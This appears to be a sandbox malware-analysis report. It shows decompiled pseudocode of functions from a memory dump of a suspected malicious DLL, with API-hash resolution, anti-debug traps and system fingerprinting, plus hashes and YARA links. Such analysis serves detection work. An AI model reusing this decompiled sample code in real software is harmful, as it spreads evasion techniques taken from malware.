COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E10010754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				char _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				char _t203;
				void* _t212;
				void* _t213;
				char _t215;
				char _t216;
				char _t223;
				char _t238;
				char _t241;
				char _t244;
				char _t247;
				char _t250;
				char _t254;
				char _t259;
				void* _t268;
				void* _t269;
				char _t271;
				char _t272;
				void* _t276;
				char _t277;
				char _t278;
				char _t282;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t347;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				intOrPtr* _t377;
				char _t382;
				char _t383;
				char _t384;
				char _t385;
				char _t386;
				char _t387;
				char _t393;
				char _t395;
				char _t401;
				char _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				intOrPtr* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				char _t420;
				intOrPtr* _t423;
				void* _t425;
				intOrPtr* _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x1001d1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E100135F4(0x30);
					 *0x1001d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E10013670(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E10013044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x1001d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E1001101C(_t404);
					 *((intOrPtr*)(_t429 + 0x198)) = 0;
					 *((char*)( *0x1001d1f8 + 0xb)) = _t162;
					_t363 = E10013044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x1001d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E10010754(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x1001bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E1000F5A8(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E1000F84C(_t429 + 0x24, E1000F4F0(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E1000F4E0(_t429 + 0x24, E1000F4F0(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E10015558(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E1000F678(_t429 + 0x20);
							E10015588(_t429 + 8, _t429 + 0x1c0, 0x5e9822cf);
							_t180 = E1001583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E1000DFDC(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E10015588(_t429 + 8, _t429 + 0x1c8, 0x80c4a2b7);
								_t420 = E1001583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E1000DFDC(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E10015588(_t429 + 8, _t429 + 0x1d0, 0xa89c042f);
								_t401 = E1001583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1d0)));
								E1000DFDC(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E1000D020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t429 + 4)) = 0;
												goto L66;
											}
											_t382 =  *((intOrPtr*)(_t429 + 4));
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E10015530(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E1000D020(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *((intOrPtr*)(_t429 + 4)) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *((intOrPtr*)(_t429 + 4));
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E10015530(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E1000D020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *((intOrPtr*)(_t429 + 4)) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *((intOrPtr*)(_t429 + 4));
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E10015530(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E1000D020(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *((intOrPtr*)(_t429 + 4)) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *((intOrPtr*)(_t429 + 4));
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E10015530(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E1000D020(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *((intOrPtr*)(_t429 + 4)) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *((intOrPtr*)(_t429 + 4));
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E10015530(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E1000D020(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *((intOrPtr*)(_t429 + 4)) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *((intOrPtr*)(_t429 + 4));
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E10015530(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x1001d1f8 + 0x24)) = _t189;
							_t190 = E10011054(0xffffffffffffffff);
							_t320 =  *0x1001d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = E100110C8(0xffffffffffffffff);
								L78:
								if(E10013044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x1001d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *((intOrPtr*)(_t429 + 0x19c)) = 0;
							_t372 = E10013044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x1001d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E100135C8(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *((intOrPtr*)(_t429 + 0x30)) =  *((intOrPtr*)(_t429 + 0x19c));
							 *((char*)(_t429 + 0x34)) = 1;
							 *((intOrPtr*)(_t429 + 0x1a4)) = 0;
							_t325 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *((intOrPtr*)(_t429 + 0x1ac)));
								if( *_t325() == 0) {
									E100135C8(_t407);
								}
							}
							_t206 =  *((intOrPtr*)(_t429 + 0x1a4));
							if( *((intOrPtr*)(_t429 + 0x1a4)) != 0) {
								E1000F5A8(_t429 + 0x18c, _t206);
								_t411 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E1000F678(_t429 + 0x188);
									goto L72;
								}
								_t212 = E1000F4E0(_t429 + 0x18c, 0);
								_t213 = E1000F4F0(_t429 + 0x188);
								_t215 =  *_t411( *((intOrPtr*)(_t429 + 0x1ac)), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E100135C8(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E1000F4E0(_t429 + 0x18c, 0);
								E1000DF84(_t429 + 0x1b4, 0);
								 *((intOrPtr*)(_t429 + 0x1ac)) = 0;
								_t377 = E10013044(0x8b9d0da7, 0x628b2cfa, 0x8b9d0da7, 0x8b9d0da7);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E1000DFF8(_t429 + 0x1b4,  *((intOrPtr*)(_t429 + 0x1ac)));
								_t223 = E10013044(0x10154545, 0x44fb2dcc, 0x10154545, 0x10154545);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *((intOrPtr*)(_t429 + 0x1ac)));
									asm("int3");
									asm("int3");
								}
								E1000E0A4(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E10014FD4( *((intOrPtr*)(_t429 + 0x1b8)), E1000E8D4( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E1000DFDC(_t429 + 0x1b8);
								E1000DFDC(_t429 + 0x1b0);
								E1000F678(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E1000BB88(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x1001d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E1000BB88(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E100135C8(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *((intOrPtr*)(_t429 + 0x14)) =  *((intOrPtr*)(_t429 + 0x198));
					 *((char*)(_t429 + 0x18)) = 1;
					 *((intOrPtr*)(_t429 + 0x1a0)) = 0;
					_t347 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
					if(_t347 != 0) {
						_push(_t429 + 0x1a0);
						_push(0);
						_push(0);
						_push(2);
						_push( *((intOrPtr*)(_t429 + 0x1a8)));
						if( *_t347() == 0) {
							E100135C8(_t404);
						}
					}
					_t262 =  *((intOrPtr*)(_t429 + 0x1a0));
					if( *((intOrPtr*)(_t429 + 0x1a0)) != 0) {
						E1000F5A8(_t429 + 0x3c, _t262);
						_t407 = E10013044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t407;
						if(_t407 == 0) {
							L107:
							E1000F678(_t429 + 0x38);
							goto L10;
						}
						_t268 = E1000F4E0(_t429 + 0x3c, 0);
						_t269 = E1000F4F0(_t429 + 0x38);
						_t271 =  *_t407( *((intOrPtr*)(_t429 + 0x1a8)), 2, _t268, _t269, _t429 + 0x1a0);
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E100135C8(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E1000F4E0(_t429 + 0x3c, 0);
						 *((intOrPtr*)(_t429 + 0x1d8 - 0x30)) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E10013044(0x8b9d0da7, 0xbdc0a291, 0x8b9d0da7, 0x8b9d0da7);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E100135C8(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *((intOrPtr*)(_t429 + 0x1a8));
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E10010FF8(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E10013044(0x8b9d0da7, 0x2ae47d4a, 0x8b9d0da7, 0x8b9d0da7);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *((intOrPtr*)(_t429 + 0x1ac)));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E10010FF8(_t403, _t413, _t403);
								}
								E1000F678(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E1000BB88(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E1000BB88(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x10010763
0x10010765
0x1001076c
0x10010feb
0x10010ff1
0x10010ff1
0x10010776
0x10010782
0x1001078e
0x10010793
0x100107a0
0x100107b1
0x100107b3
0x100107b4
0x100107b5
0x100107b5
0x100107b6
0x100107ba
0x100107be
0x100107c3
0x100107c6
0x100107cc
0x100107e6
0x100107ed
0x100107f0
0x100107f3
0x100107f5
0x10010801
0x1001080e
0x1001081b
0x1001081f
0x100108ab
0x100108ab
0x100108ad
0x100108b1
0x100108bc
0x100108d2
0x100108d5
0x100108d5
0x100108d9
0x100108e2
0x100108e7
0x100108e7
0x100108e9
0x100108fa
0x1001091c
0x1001091e
0x1001091f
0x10010923
0x10010923
0x1001092c
0x10010938
0x10010941
0x10010957
0x10010967
0x1001096c
0x10010970
0x10010975
0x10010977
0x100109c7
0x100109dc
0x100109e0
0x100109e5
0x100109f6
0x10010a0b
0x10010a0f
0x10010a14
0x10010a16
0x10010a5d
0x10010a60
0x10010aae
0x10010ab1
0x10010af2
0x10010af6
0x10010afb
0x10010b00
0x10010b1f
0x10010b1f
0x10010b1f
0x10010b21
0x00000000
0x10010b21
0x10010b02
0x10010b06
0x10010b08
0x10010b0f
0x10010b0f
0x10010b15
0x10010b15
0x10010b17
0x10010b1a
0x10010b1a
0x00000000
0x10010b17
0x10010b0a
0x10010b0d
0x10010b13
0x10010b13
0x00000000
0x10010b13
0x00000000
0x10010b0d
0x10010ab3
0x10010ab6
0x00000000
0x00000000
0x10010abc
0x10010ac1
0x10010ac6
0x10010ae5
0x10010ae5
0x10010aef
0x00000000
0x10010aef
0x10010ac8
0x10010acc
0x10010ace
0x10010ad5
0x10010ad5
0x10010adb
0x10010adb
0x10010add
0x10010ae0
0x10010ae0
0x00000000
0x10010add
0x10010ad0
0x10010ad3
0x10010ad9
0x10010ad9
0x00000000
0x10010ad9
0x00000000
0x10010ad3
0x10010a62
0x10010a64
0x10010aa3
0x10010aa6
0x10010e18
0x10010e1d
0x10010e22
0x10010e41
0x10010e41
0x10010e4b
0x00000000
0x10010e4b
0x10010e24
0x10010e28
0x10010e2a
0x10010e31
0x10010e31
0x10010e37
0x10010e37
0x10010e39
0x10010e3c
0x10010e3c
0x00000000
0x10010e39
0x10010e2c
0x10010e2f
0x10010e35
0x10010e35
0x00000000
0x10010e35
0x00000000
0x10010e2f
0x00000000
0x10010aac
0x10010a6a
0x10010a6f
0x10010a74
0x10010a93
0x10010a93
0x10010a9d
0x00000000
0x10010a9d
0x10010a76
0x10010a7a
0x10010a7c
0x10010a83
0x10010a83
0x10010a89
0x10010a89
0x10010a8b
0x10010a8e
0x10010a8e
0x00000000
0x10010a8b
0x10010a7e
0x10010a81
0x10010a87
0x10010a87
0x00000000
0x10010a87
0x00000000
0x10010a81
0x10010a18
0x10010a1a
0x00000000
0x00000000
0x10010a24
0x10010a29
0x10010a2e
0x10010a4d
0x10010a4d
0x10010a57
0x00000000
0x10010a57
0x10010a30
0x10010a34
0x10010a36
0x10010a3d
0x10010a3d
0x10010a43
0x10010a43
0x10010a45
0x10010a48
0x10010a48
0x00000000
0x10010a45
0x10010a38
0x10010a3b
0x10010a41
0x10010a41
0x00000000
0x10010a41
0x00000000
0x10010a3b
0x1001097d
0x10010982
0x10010987
0x100109a6
0x100109a6
0x100109b0
0x00000000
0x100109b0
0x10010989
0x1001098d
0x1001098f
0x10010996
0x10010996
0x1001099c
0x1001099c
0x1001099e
0x100109a1
0x100109a1
0x00000000
0x1001099e
0x10010991
0x10010994
0x1001099a
0x1001099a
0x00000000
0x1001099a
0x00000000
0x100108be
0x100108c0
0x10010b25
0x10010b2a
0x10010b2d
0x10010b32
0x10010b34
0x10010b49
0x10010b4c
0x10010c1a
0x10010c22
0x10010c25
0x10010c3a
0x10010c44
0x10010c44
0x10010c46
0x10010c48
0x10010c57
0x10010c63
0x10010c67
0x10010c6a
0x10010c6d
0x10010c70
0x00000000
0x10010c70
0x10010b5c
0x10010b6e
0x10010b72
0x10010bfe
0x10010bfe
0x10010c04
0x10010c0f
0x10010c06
0x10010c06
0x10010c06
0x00000000
0x10010c04
0x10010b7f
0x10010b80
0x10010b82
0x10010b88
0x10010fd7
0x10010fdc
0x10010fde
0x00000000
0x00000000
0x10010fe4
0x10010b9f
0x10010ba3
0x10010ba8
0x10010bba
0x10010bbe
0x10010bc9
0x10010bca
0x10010bcb
0x10010bcc
0x10010bce
0x10010bd9
0x10010e51
0x10010e51
0x10010bd9
0x10010bdf
0x10010be8
0x10010e63
0x10010e79
0x10010e7b
0x10010e7d
0x10010fb8
0x10010fbf
0x00000000
0x10010fbf
0x10010e8c
0x10010e9a
0x10010eb4
0x10010eb6
0x10010eb8
0x10010fc9
0x10010fce
0x10010fd0
0x00000000
0x00000000
0x10010fd2
0x10010ecc
0x10010ed7
0x10010ee6
0x10010ef8
0x10010efa
0x10010efc
0x10010f09
0x10010f09
0x10010f19
0x10010f2a
0x10010f2f
0x10010f31
0x10010f33
0x10010f3a
0x10010f3b
0x10010f3b
0x10010f47
0x10010f68
0x10010f71
0x10010f7d
0x10010f89
0x10010f8e
0x10010f93
0x10010f99
0x10010f99
0x10010f9e
0x10010fa4
0x00000000
0x10010faa
0x10010fac
0x00000000
0x10010fac
0x10010bee
0x10010bee
0x10010bf3
0x10010bf9
0x10010bf9
0x00000000
0x10010bf3
0x10010be8
0x100108bc
0x1001082c
0x1001082d
0x1001082f
0x10010835
0x10010e02
0x10010e07
0x10010e09
0x00000000
0x00000000
0x10010e0f
0x1001084c
0x10010850
0x10010855
0x10010867
0x1001086b
0x10010876
0x10010877
0x10010878
0x10010879
0x1001087b
0x10010886
0x10010c7e
0x10010c7e
0x10010886
0x1001088c
0x10010895
0x10010c8d
0x10010ca3
0x10010ca5
0x10010ca7
0x10010dd8
0x10010ddc
0x00000000
0x10010ddc
0x10010cb3
0x10010cbe
0x10010cd8
0x10010cda
0x10010cdc
0x10010df4
0x10010df9
0x10010dfb
0x00000000
0x00000000
0x10010dfd
0x10010ced
0x10010cfb
0x10010d02
0x10010d03
0x10010d04
0x10010d16
0x10010d18
0x10010d1a
0x00000000
0x00000000
0x10010d22
0x10010d3d
0x10010d3f
0x10010d41
0x10010de6
0x10010deb
0x10010ded
0x00000000
0x00000000
0x10010def
0x10010d47
0x10010d4e
0x10010d52
0x10010dbd
0x10010dbd
0x10010dbf
0x10010dc6
0x10010dc6
0x10010dcc
0x10010dcc
0x10010dce
0x10010dd3
0x10010dd3
0x00000000
0x10010dce
0x10010dc1
0x10010dc4
0x10010dca
0x10010dca
0x00000000
0x10010dca
0x00000000
0x10010dc4
0x10010d54
0x10010d54
0x10010d56
0x10010d62
0x10010d67
0x10010d69
0x00000000
0x00000000
0x10010d6b
0x10010d6f
0x10010d76
0x10010d77
0x10010d78
0x10010d7a
0x00000000
0x00000000
0x10010d7c
0x10010d7e
0x10010d85
0x10010d85
0x10010d8b
0x10010d8b
0x10010d8d
0x10010d92
0x10010d92
0x10010d9b
0x10010da0
0x10010da5
0x10010dab
0x10010dab
0x10010db0
0x00000000
0x10010db0
0x10010d80
0x10010d83
0x10010d89
0x10010d89
0x00000000
0x10010d89
0x00000000
0x10010db7
0x10010db7
0x10010db8
0x10010db8
0x00000000
0x10010d56
0x1001089b
0x100108a0
0x100108a6
0x100108a6
0x00000000
0x10010c7d
0x10010c7d
0x10010c7d

APIs

GetSystemInfo.KERNELBASE(?,10154545,10154545,?,?,A89C042F,?,?,80C4A2B7,?,?,5E9822CF,00000000,80000002,00000000,-000000FC), ref: 10010C44

Strings

J}*, xrefs: 10010D5B

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoSystem
String ID: J}*
API String ID: 31276548-3566034359
Opcode ID: de39312790fd6a10ca225a58ebf97e9de9bec6b3d7fa269fb6eef2ba11d2b196
Instruction ID: 2d0b7547684741a8baa3a0fbe14fb8abeb41ea5cf6ce277a40cb2789471ff98d
Opcode Fuzzy Hash: de39312790fd6a10ca225a58ebf97e9de9bec6b3d7fa269fb6eef2ba11d2b196
Instruction Fuzzy Hash: 6B22D134708341AAE760DB20C851BAF77E9EF85384F51892DF8C99F196DBB0E885C752

Uniqueness

Uniqueness Score: -1.00%

Function 1001223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001223C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E10013AD0(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E10013044(0xfe338407, 0x8f5bb83f, 0xfe338407, 0xfe338407);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x1001223c
0x10012240
0x1001225c
0x1001225f
0x10012242
0x10012251
0x10012254
0x10012254
0x1001226f
0x10012274
0x10012278
0x10012280
0x10012280
0x10012284

APIs

NtDelayExecution.NTDLL(00000000,00000000,FE338407,FE338407,FFFFFFFF,FFFFFFFF,1000355F,00000000,00000000,?), ref: 10012280

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction ID: d0a8015942f24f2c6afed74c3266fb82d20468a4a0b203c2a4d98c8a0aecf533
Opcode Fuzzy Hash: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction Fuzzy Hash: E2E06DB460E3017EE684DB684D01F2F76D8DF94650F21862CF485CA684EA30D8418262

Uniqueness

Uniqueness Score: -1.00%

Function 10012840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012840(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E10013044(0xfe338407, 0x9a85f5ac, 0xfe338407, 0xfe338407) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x10012847
0x10012850
0x1001285e
0x10012881
0x10012881
0x10012860
0x10012877
0x1001287b
0x00000000
0x1001287d
0x1001287d
0x1001287d
0x1001287b
0x10012886

APIs

NtAllocateVirtualMemory.NTDLL(100188BE,?,00000000,000000FF,100188BE,100188BE,FE338407,FE338407,?,?,100188BE,00003000,00000004,000000FF), ref: 10012877

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction ID: 73fdb7ac893e18072b78b5a5d28676d58b7b5527bfc86622bc5d2d8ef3a32b6e
Opcode Fuzzy Hash: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
